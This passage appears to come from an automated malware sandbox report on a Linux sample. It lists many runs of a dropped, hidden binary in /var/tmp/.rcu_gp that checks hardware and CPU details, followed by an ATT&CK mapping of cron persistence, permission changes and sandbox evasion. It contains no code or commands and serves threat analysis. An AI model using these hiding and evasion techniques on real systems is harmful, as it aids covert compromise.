- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1757

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
PID:1769

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Checks CPU configuration
PID:1781

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1793

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
PID:1813

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1829

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
PID:1841

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1853

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
PID:1865

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1877

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
PID:1889

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1901

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1913

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
PID:1925

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Reads hardware information
- Checks CPU configuration
PID:1937

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1949

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1961

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Reads hardware information
- Checks CPU configuration
PID:1973

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1985

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Checks hardware identifiers (DMI)
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1997

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
PID:2009

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:2021

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:2033

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:2045

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Checks hardware identifiers (DMI)
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:2057

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
PID:2069

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
PID:2081

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Checks hardware identifiers (DMI)
- Checks CPU configuration
- Reads CPU attributes
PID:2093

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
PID:2117

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Checks hardware identifiers (DMI)
- Checks CPU configuration
- Reads CPU attributes
PID:2129

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Reads hardware information
- Checks CPU configuration
- Enumerates kernel/hardware configuration
PID:2141

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:2153

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Reads hardware information
- Checks CPU configuration
PID:2165

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Checks CPU configuration
- Reads CPU attributes
PID:2177

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Checks hardware identifiers (DMI)
- Checks CPU configuration
- Reads CPU attributes
PID:2189

/var/tmp/.rcu_gp/.report_system
/var/tmp/.rcu_gp/./.report_system
1⤵
- Checks hardware identifiers (DMI)
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:2201

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

Persistence

Scheduled Task/Job

T1053

Cron

Privilege Escalation

Scheduled Task/Job

T1053

Cron

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

Credential Access

Discovery

System Information Discovery

Virtualization/Sandbox Evasion

T1497

System Checks